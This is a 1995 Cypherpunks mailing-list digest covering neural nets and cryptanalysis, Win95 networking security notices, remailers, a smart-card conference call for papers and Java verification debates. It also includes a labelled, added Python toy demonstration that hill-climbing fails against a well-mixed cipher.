From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 14 Nov 1995 03:22:33 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
In-Reply-To: <acc933c500021004a249@[205.199.118.202]>
Message-ID: <199511110125.RAA04930@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> At 7:52 PM 11/10/95, Bill Stewart wrote:

>>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>>cryptography, primarily because of the shape of the solution space.
>>Neural nets work best for problems that have a continuity of solutions,
>>some better than others.  This allows a neural net to learn, proposing
>>better and better solutions as it does.  Breaking an algorithm provides
>>for very little in the way of learning opportunities:  You either recover
>>the key or you don't. (At least this is true if the algorithm is any
>>good.) Neural nets work well in structured environments when there is
>>something to learn, but not in the high-entropy, seemingly random world of
>>cryptography."
>>And he doesn't give any references.
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
> on the usefulness of AI and neural nets for crypto. Sounds almost like
> exactly the paragraph I wrote, in fact.

As it happens, I saved that one, because I thought the "needle standing up
from a flat plain" metaphor was so apt; I've used it in a couple of talks
without remembering where I got it.  Here's your message to sci.crypt:

  From: tcmay@netcom.com (Timothy C. May)
  Subject: Re: Neural nets & Crypto
  Message-Id: <tcmayCuBz0q.739@netcom.com>
  Date: Wed, 10 Aug 1994 17:53:13 GMT

  Neural nets are not likely to do well with modern ciphers (e.g., RSA,
  IDEA, DES, etc.), mainly because of the shape of the solution space.

  Instead of the "rolling hills and valleys" that neural nets (and
  related methods, such as genetic algorithms, simulated annealing,
  etc.) do well in, the solution space for modern ciphers offers very
  little in the way of "learning" opportunities: you either have the
  solution (the key), or you don't.

  Think of a needle standing up from a flat plain...a NN or any other
  hill-climber could wander for years and never find it.

  I suspect there are uses in peripheral aspects, such as guessing
  passwords (when people have not picked high-entropy passwords, but
  have instead used familiar names). Or in traffic analysis.

  But the move in modern cryptology is definitely away from using
  anything with "structure" that can be learned. Put another way, neural
  nets and such work well in structured environments, where there's
  something to _learn_, but not in the high-entropy, seemingly random
  world of encrypted data.

  --Tim May

A subsequent message (which I also saved) dealt with genetic programming
and was also interesting.

	Jim Gillogly
	21 Blotmath S.R. 1995, 01:22
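
The "needle standing up from a flat plain" argument in the messages above can be measured directly. The following is an added example, not part of any message in this archive: it runs the same bit-flipping hill climber against a repeating-key XOR and against a SHA-256 keystream used as a stand-in for a well-mixed cipher. The key, the known plaintext and both toy ciphers are constructed for the illustration.

```python
import hashlib
import random

# Constructed sample data: a 64-byte known plaintext and a 32-bit key.
KNOWN_PLAINTEXT = (b"a needle standing up from a flat plain gives a hill "
                   b"climber nothing to follow")[:64]
TRUE_KEY = bytes.fromhex("5ac3971e")
KEY_BITS = 8 * len(TRUE_KEY)


def xor_cipher(key, data):
    """Structured toy cipher: repeating-key XOR (it is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def hashed_stream_cipher(key, data):
    """Stand-in for a well-mixed cipher: XOR with a SHA-256 keystream."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(b ^ s for b, s in zip(data, stream))


def score(cipher, key, ciphertext):
    """Fraction of plaintext bits a trial key gets right (known-plaintext setting)."""
    trial = cipher(key, ciphertext)
    wrong = sum(bin(a ^ b).count("1") for a, b in zip(trial, KNOWN_PLAINTEXT))
    return 1 - wrong / (8 * len(KNOWN_PLAINTEXT))


def flip_bit(key, bit):
    out = bytearray(key)
    out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def landscape(cipher, max_distance=8):
    """Scores of keys that differ from the true key in 1..max_distance bits."""
    ciphertext = cipher(TRUE_KEY, KNOWN_PLAINTEXT)
    key, scores = TRUE_KEY, []
    for bit in range(max_distance):
        key = flip_bit(key, bit)          # one more wrong bit each round
        scores.append(score(cipher, key, ciphertext))
    return scores


def hill_climb(cipher, steps=2000, seed=1995):
    """Flip one random key bit per step and keep the flip only if the score rises."""
    rng = random.Random(seed)
    ciphertext = cipher(TRUE_KEY, KNOWN_PLAINTEXT)
    key = bytes(rng.randrange(256) for _ in range(len(TRUE_KEY)))
    best = score(cipher, key, ciphertext)
    for _ in range(steps):
        candidate = flip_bit(key, rng.randrange(KEY_BITS))
        s = score(cipher, candidate, ciphertext)
        if s > best:
            key, best = candidate, s
    return key, best


if __name__ == "__main__":
    for name, cipher in (("repeating XOR", xor_cipher),
                         ("SHA-256 keystream", hashed_stream_cipher)):
        key, best = hill_climb(cipher)
        print(name)
        print("  score at 1..8 wrong key bits:",
              [round(s, 3) for s in landscape(cipher)])
        print("  hill climber ended at score %.3f, key recovered: %s"
              % (best, key == TRUE_KEY))
```

With the XOR cipher every corrected key bit raises the score by exactly 1/32, so the climber walks straight to the key. With the hashed keystream a key that is one bit off scores about the same as a random guess, so the climber only accumulates noise.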




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 09:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <acc933c500021004a249@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM 11/10/95, Bill Stewart wrote:

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.
>Neural nets work best for problems that have a continuity of solutions,
>some better than others.  This allows a neural net to learn, proposing
>better and better solutions as it does.  Breaking an algorithm provides
>for very little in the way of learning opportunities:  You either recover
>the key or you don't. (At least this is true if the algorithm is any
>good.)  Neural nets work well in structured environments when there is
>something to learn, but not in the high-entropy, seemingly random world of
>cryptography."
>And he doesn't give any references.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
on the usefulness of AI and neural nets for crypto. Sounds almost like
exactly the paragraph I wrote, in fact.

And I recollect that Bruce dropped me a note saying I made the point
succinctly and that he wanted to use what I said in his next edition. (My
recollection at least, but I don't have any easy way anymore of searching
my several hundred megs of accumulated mail, articles, etc.)

I have no problem with Bruce using my points. I hope he didn't use my
_exact_ words, though. But not a cosmic issue.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 11 Nov 1995 08:46:43 +0800
To: cypherpunks@toad.com
Subject: Re: Yvette
Message-ID: <199511101724.RAA09597@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just another Detweiler Tentacle......

Love Always,

Carol Anne Tentaclefinder

>> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
>> is...
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 11 Nov 1995 07:54:53 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511102323.SAA06186@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Bruce Schneier comments:

   Neural Networks

   Neural nets aren't terribly useful for cryptanalysis,
   primarily because of the shape of the solution space.
   Neural nets work best with problems that have a continuity
   of solutions, some better than others. This allows a neural
   net to learn, proposing better and better solutions as it
   does. Breaking an algorithm provides for very little in the
   way of learning opportunities: You either recover the key
   or you don't. (At least this is true if the algorithm is
   any good.) Neural nets work well in structured environments
   where there is something to learn, but not in the
   high-entropy, seemingly random world of cryptography.

   "Applied Cryptography," second edition, 1996, p. 155.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 10 Nov 1995 17:06:09 +0800
To: cypherpunks@toad.com
Subject: NOISE: Bill Gates view of SW Bugs and new releases - some quotes
Message-ID: <199511100853.AA35016@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Here is some signature fodder.

>FOCUS - is a German magazine
>
>
>FOCUS: Every new release of a software which has less bugs than the older
>       one is also more complex and has more features...
>Gates: No, only if that is what'll sell!
>
>FOCUS: But...
>Gates: Only if that is what'll sell! We've never done a piece of software
>       unless we thought it would sell. That's why everything we do in 
>       software ... it's really amazing: We do it because we think that's 
>       what customers want. That's why we do what we do.
>
>FOCUS: But on the other hand - you would say: Okay, folks, if you don't
>       like these new features, stay with the old version, and keep the bugs?
>Gates: No! We have lots and lots of competitors. The new version - it's not
>       there to fix bugs. That's not the reason we come up with a new version.
>
>FOCUS: But there are bugs in any version which people would really like to
>       have fixed.
>Gates: No! There are no significant bugs in our released software that any
>       significant number of users want fixed.
>
>FOCUS: Oh, my God. I always get mad at my computer if MS Word swallows the
>       page numbers of a document which I printed a couple of times with page
>       numbers. If I complain to anybody they say "Well, upgrade from 
>       version 5.11 to 6.0".
>Gates: No! If you really think there's a bug you should report a bug. Maybe
>       that you're not using it properly. Have you ever considered that?
>
>FOCUS: Yeah, I did...
>Gates: It turns out Luddites don't know how to use software properly, so
>       you should look into that. - The reason we come up with new versions 
>       is not to fix bugs. It's absolutely not. It's the stupidest reason to 
>       buy a new version I ever heard. When we do a new version we put in lots
>       of new things that people are asking for. And so, in no sense, is 
>       stability a reason to move to a new version. It's never a reason.
>
>FOCUS: How come I keep being told by computer vendors "Well, we know about
>       this bug, wait till the next version is there, it'll be fixed"? I hear 
>       this all the time. How come? If you're telling me there are no 
>       significant bugs in software and there is no reason to do a new version?
>Gates: No. I'm saying: We don't do a new version to fix bugs. We don't. Not
>      enough people would buy it. You can take a hundred people using Microsoft
>      Word. Call them up and say "Would you buy a new version because of bugs?"
>      You won't get a single person to say they'd buy a new version because of
>      bugs. We'd never be able to sell a release on that basis.
>
>FOCUS: Probably you have other contacts to your software developers. But if
>       Mister Anybody, like me, calls up a store or a support line and says, 
>       "Hey listen, there's a bug" ... 90 percent of the time I get the answer
>       "Oh, well, yeah, that's not too bad, wait to the next version and it'll
>       be fixed". That's how the system works.
>
>Gates: Guess how much we spend on phone calls every year.
>FOCUS: Hm, a couple of million dollars?
>
>Gates: 500 million dollars a year. We take every one of these phone calls
>       and classify them. That's the input we use to do the next version. 
>       So it's like the world's biggest feedback loop. People call in - we 
>       decide what to do on it. Do you want to know what percentage of those 
>       phonecalls relates to bugs in the software? Less than one percent.
>
>FOCUS: So people call in to say "Hey listen, I would love to have this and
>       that feature"?
>Gates: Actually, that's about five percent. Most of them call to get advice
>      on how to do a certain thing with the software. That's the primary thing.
>      We could have you sit and listen to these phone calls. There are millions
>      and millions of them. It really isn't statistically significant. Sit in
>      and listen to Win 95 calls, sit in and listen to Word calls, and wait, 
>      just wait for weeks and weeks for someone to call in and say "Oh, I 
>      found a bug in this thing".
>...
>
>FOCUS: So where does this common feeling of frustration come from that
>       unites all the PC users? Everybody experiences it every day that these
>       things simply don't work like they should.
>Gates: Because it's cool. It's like, "Yeah, been there done that - oh,
>       yeah, I know that bug." - I can understand that phenomenon 
>       sociologically, not technically.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 16:44:42 +0800
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <4814sh$i3g@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000-compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 20:37:05 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <199511130517.VAA21401@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000-compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com
Date: Sat, 11 Nov 1995 11:58:25 +0800
To: cypherpunks@toad.com
Subject: POTP Security
Message-ID: <gate.RXLDeD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


>POTP(tm) Secure FTP version 1.5 for MS Windows
>===============================================
>
>The first commercially available implementation of our 
>POTP (Power One Time Pad) encryption algorithm. The package includes 
>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>a stand alone file encryption program.
>
>Both our client and server support standard ftp, in addition to 
>absolutely user-transparent encryption on-the-fly of all data 
>sent/received when connected to a POTP Secure FTP Server/Client.

What level of security does this cute, little puppy provide???






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 14 Nov 1995 03:08:09 +0800
To: cypherpunks@toad.com
Subject: Current list of Remailers
Message-ID: <199511110131.TAA00538@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Everyone,

	Since Raph announced his new Type-II remailer list, I just
wanted to let everyone know that I have updated the type2.list and
pubring.mix files on jpunix.com to reflect the most up-to-date status
of the Type-II Mixmaster remailers. You can connect to
http://www.jpunix.com or ftp to ftp.jpunix.com to get the latest
configuration files.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 11 Nov 1995 09:47:12 +0800
To: bsdc@ai.mit.edu
Subject: CFP: CARDIS 1996
Message-ID: <v02120d00acc9aa51a6cc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Found this in sci.crypt.research.

Notice the name at the top of the program committee...

Cheers,
Bob Hettinga


___________________________________________



                         First Call For Papers

                              CARDIS 1996

    SECOND SMART CARD RESEARCH AND ADVANCED APPLICATION CONFERENCE

            September 18-20, 1996, Amsterdam, The Netherlands

AIMS AND GOALS

Smart cards or IC cards offer a huge potential for information
processing purposes. The portability and processing power of IC cards
allow for highly secure conditional access and reliable distributed
information systems. IC cards are already available that can perform
highly sophisticated cryptographic computations. The applicability of
IC cards is currently limited mainly by our imagination; the
information processing power that can be gained by using IC cards
remains as yet mostly untapped and is not well understood. Here lies a
vast uncovered research area which we are only beginning to assess, and
which will have great impact on the eventual success of the technology.
The research challenges range from electrical engineering on the
hardware side to tailor-made cryptographic applications on the software
side, and their synergies.

Many currently existing events are mainly devoted to commercial and
application aspects of IC cards. In contrast, the CARDIS conferences
aim to bring together researchers who are active in all aspects of
design of IC cards and related devices and environment, such as to
stimulate synergy between different research communities and to offer a
platform for presenting the latest research advances. CARDIS 1994,
sponsored by the International Federation for Information Processing
(IFIP) and held in November 1994 in Lille, France, has successfully
brought together representatives from leading IC research centers from
all over the world. CARDIS 1996 will be the second occasion for the IC
card community in this permanent activity. CARDIS 1996 will be
organised jointly by the Centre for Mathematics and Computer Science at
Amsterdam (CWI) and the Department of Computer Systems of the
University of Amsterdam (UvA).


SUBMISSIONS

Submissions will be judged on relevance, originality, significance,
correctness, and clarity. Each paper should explain its contribution in
both general and technical terms, identifying what has been
accomplished, saying why it is significant, and comparing it with
previous work. Authors should make every effort to make the technical
content of their papers understandable to a broad audience. Papers
should be written in English.

Authors should submit:

* 16 copies
* of a full paper
* typeset using the Springer LNCS format (see instructions below)
* not exceeding 20 pages in length
* printed double-sided if possible
* addressed to

  Pieter H. Hartel
  Univ. of Amsterdam
  Dept. of Computer Systems
  Kruislaan 403
  1098 SJ Amsterdam
  The Netherlands

In addition, each submission should be accompanied by information
submitted via WWW, (http://www.cwi.nl/~brands/cardis/submit.html) or
submitted via email to cardis@fwi.uva.nl that consists of:

* a single postal address and electronic mail address for
  communication
* complete title, author and affiliation information
* the abstract of the paper
* a small selection of the keywords that appear on this call for
  papers, which best describe the contribution of the paper

Proceedings will be available at the conference. It is intended to
publish the proceedings in the Springer LNCS series. Authors of
accepted papers may be expected to sign a copyright release form.


IMPORTANT DATES

  Submission deadline           March 1, 1996
  Acceptance notification       May 15,  1996
  Camera ready paper due        July 1,  1996
  Conference                    September 18--20 1996

THEMES

    Technology/hardware
 1    IC architecture and techniques
 2    Memories and processor design
 3    Read/Write unit engineering
 4    Specific co-processors for cryptography
 5    Biometry
 6    Communication technologies
 7    Interfaces with the user, the service suppliers
 8    Reliability and fault tolerance
 9    Special devices
10    Standards
    Software
11    The operating system
12    Models of data management
13    Communication protocols
    IC Card design
14    Tools for internal or external software production
15    Validation and verification
16    Methodology for application design
    Electronic payment systems
17    Road pricing
18    Internet payment systems
19    Untraceability
    Algorithms
20    Formal specification and validation
21    Identification
22    Authentication
23    Cryptographic protocols for IC cards
24    Complexity
    Security
25    Models and schemes of security
26    Security interfaces
27    Hardware and software implementation
28    Security of information systems including cards
29    Formal verification of transaction sets
30    Protocol verification
    IC Cards, individuals and the society
31    IC cards and privacy
32    Owner access of data
33    IC cards: political and economical aspects
34    Is the IC card going to change legislation?
35    Patents, copyrights
    Future of IC cards
36    Innovative technologies
37    Moving towards the pocket intelligence
38    Convergence with portable PCs, lap tops etc ...
39    PCMCIA
    Innovative applications
40    Design methodology of applications
41    IC cards and the information system
42    Examples of new applications
43    Requirements for innovative cards
    Standards
44    Emerging standards
45    Compliance and approval


ORGANISATION

Steering committee chairman:

  Vincent Cordonnier (Rd2p, Lille)

Local organisation:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Stefan Brands (CWI, The Netherlands)
  Eduard de Jong (QC consultancy, The Netherlands)

General Chairman:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)

Program Chairmen:

  Pierre Paradinas (Rd2p, Lille)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)

Program committee

  Stefan Brands (CWI, Amsterdam)
  André Gamache (Québec, Canada)
  Louis Guillou (CCETT, France)
  Josep Domingo Ferrer (Tarragona, Spain)
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Hans-Joachim Knobloch (Karlsruhe, Germany)
  Pierre Paradinas (Rd2p, France)
  Reinhard Posch (Graz, Austria)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)
  Matt Robshaw (RSA, inc, USA)
  Bruno Struif (GMD, Germany)
  Doug Tygar (Carnegie-Mellon, USA)


LECTURE NOTES IN COMPUTER SCIENCE

Advice to Authors for the Preparation of Camera-Ready Contributions to
LNCS/LNAI Proceedings

The preparation of manuscripts which are to be reproduced by
photo-offset requires special care. Manuscripts which are submitted in
technically unsuitable form will be returned for retyping or cancelled
if the volume otherwise cannot be finished on time. In order to make
the volume look as uniform as possible the following instructions
should be followed closely.

************

* PRINTING AREA:
Using 10-point font size for the main text the printing area should be
12.2 x 19.3 cm. Manuscripts prepared in this preferred format are
reproduced in the same size in the book. With these settings, the
interline distance should be arranged in such a way that some 42 to 45
lines occur on a full-text page.

* TYPEFACE and SIZE:
We recommend the use of Times or one of the similar typefaces widely
used in phototypesetting. (In Times and similar typefaces the letters
have serifs, i.e., short endstrokes at the head and the foot of
letters.) Please do not use a sans-serif typeface for running text,
except for computer programs.

The text should always be justified to occupy the full line width, so
that the right margin is not ragged. For normal text please use
10-point type size and one-line spacing. Small print (abstract and
affiliation) should be set in 9-point type size. Please use italic
print to emphasize words in running text; bold type in running text
and underlining should be avoided.

Headings should be capitalized (i.e., nouns, verbs and all other words
with at least five letters should have a capital initial) and should,
with the exception of the title, be aligned to the left. The font
sizes are as follows:

************

Heading level       Example                   Font size and style

Title (centered)    Type Theory               14 point, bold
1st-level heading   1 Introduction            12 point, bold
2nd-level heading   2.1 Simple Connections    10 point, bold
3rd-level heading   Typing Rules.             10 point, bold
4th-level heading   Remarks: (text follows)   10 point, italic

************

* FIGURES:
If possible, originals should be pasted into the manuscript and
centered between the margins; if no originals of the required size are
available, figures may be reduced in scale and pasted into the text.
For halftone figures (photos), please forward high-contrast glossy
prints and mark the space in the text as well as the back of the
photographs clearly, so that there can be no doubt about where or
which way up they should be placed. The lettering of figures should be
in 10-point font size. Figures should be numbered. The legends also
should be centered between the margins and be written in 9-point font
size as follows:

(bold) Fig. 3. (text follows)

* PAGE NUMBERING:
Your paper should show no printed page numbers; they are decided by
the volume editor and finally inserted by the printer. Please indicate
the ordering of your pages by numbering the sheets (using a light
blue/green pencil) at the bottom of the reverse side. There also
should be no running heads.

* PRINTING QUALITY:
For reproduction we need sheets which are printed on one side only.
Please use a high-resolution printer, preferably a laser printer with
at least 300 dpi or higher resolution if possible. It is desirable
that on all pages the text appears in the middle of the sheets.

* REMARK 1:
If your typesetting system does not offer the variety of font sizes
needed for the preparation of your manuscript according to these
instructions, you may choose a different (larger) font size and a
correspondingly scaled printing area (12-point font size for the
running text, for example, corresponds to a printing area of 15.3 x
24.2 cm and to a final reduction rate of 80%).

* REMARK 2:
You are encouraged to use LaTeX or TeX for the preparation of your
camera-ready manuscript together with the corresponding Springer style
files "llncs" (for LaTeX) or "plncs" (for TeX) to be obtained by
e-mail or by ftp/gopher as follows:

Mailserver: Send an e-mail message to
   svserv@vax.ntp.springer.de  containing the line
   get /tex/latex/llncs.zip  for the LaTeX style files or
   get /tex/plain/plncs.zip  for the TeX style files.
Sending "help" to the server prompts advice on how to interact with
the mail server. The style files have to be unzipped and uu-decoded
for use. In case of problems in getting or uu-decoding the style files
please contact "springer vax.ntp.springer.de".

Ftp: The internet address is "trick.ntp.springer.de", the user id
"ftp" or "anonymous". Please enter your e-mail address as password.
The (above mentioned) files reside in "/pub/tex/latex/llncs".

Gopher: Point your client to "trick.ntp.springer.de".


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an237621@anon.penet.fi
Date: Sat, 11 Nov 1995 04:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: Yvette
In-Reply-To: <199511101816.LAA02444@nagina.cs.colorado.edu>
Message-ID: <199511101201.MAA00215@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain



:
: tony266@vabeach.email.net allegedly wrote:
:
: I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
: is...
:
Yes, there is a cow on the lawn.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 11:52:46 +0800
To: "James M. Cobb" <cypherpunks@toad.com
Subject: Re: New World Encryption
Message-ID: <acc9550f0102100474a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 11/11/95, James M. Cobb wrote:
>
>
>Friend,
>
>
>An item in 11 09 95 Edupage summarizes a NY Times new-
>sstory revealing Clinton's wish to spy on the world:
>
>OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND


"Friend,"

I'm sure your intentions are good in forwarding this and other similar
items to the Cypherpunks mailing list, but if you are reading the list, you
should surely know that this item--including both summaries and the
complete article--has already been posted to the Cypherpunks list. Two
days ago, in fact.

If for some reason you are _not_ reading the CP list, or not paying
attention, then you really should not be forwarding stuff to it.

I'm copying the CP list on this to remind folks to "stay on the page" as to
what's already been posted. We are already becoming a kind of "automatic
cc:" for a variety of announcements, spams, and other earthshattering
items.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 13 Nov 1995 17:29:45 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511110538.VAA18697@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:

> >>> While all this checking appears excruciatingly detailed, by the time
> >>> the byte code verifier has done its work, the Java interpreter can
> >>> proceed knowing that the code will run securely. Knowing these
> >>> properties makes the Java interpreter much faster, because it doesn't
> >>> have to check anything.
> >
> >Yikes!!  I'll leave this for someone else to address.  This sounds to me
> >like a variation on virus scanning.  I think that there are far more
> >reputable virus experts than I who can comment and expand on *flaws* with
> >that approach.
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
> finite state automata like the java interpreter (made more difficult by the
> fact that it can use the "net" for additional state), it is not even
> remotely feasible.

OK, so by saying that it is not "even remotely feasible", you're saying 
that any comp-sci undergraduate will say that it can't be done?  

That is what "not even remotely feasible" means, doesn't it??  I mean, 
even if Marketing wants this problem solved, that won't be enough?

> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state
> Busy Beaver problem. Deal?

I'm sorry, I only work for T-shirt and mug contests. <grin>  That fifteen 
minutes of fame thingy, just isn't my cup of tea.



> Dietrich Kappe | Red Planet    http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
> 1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
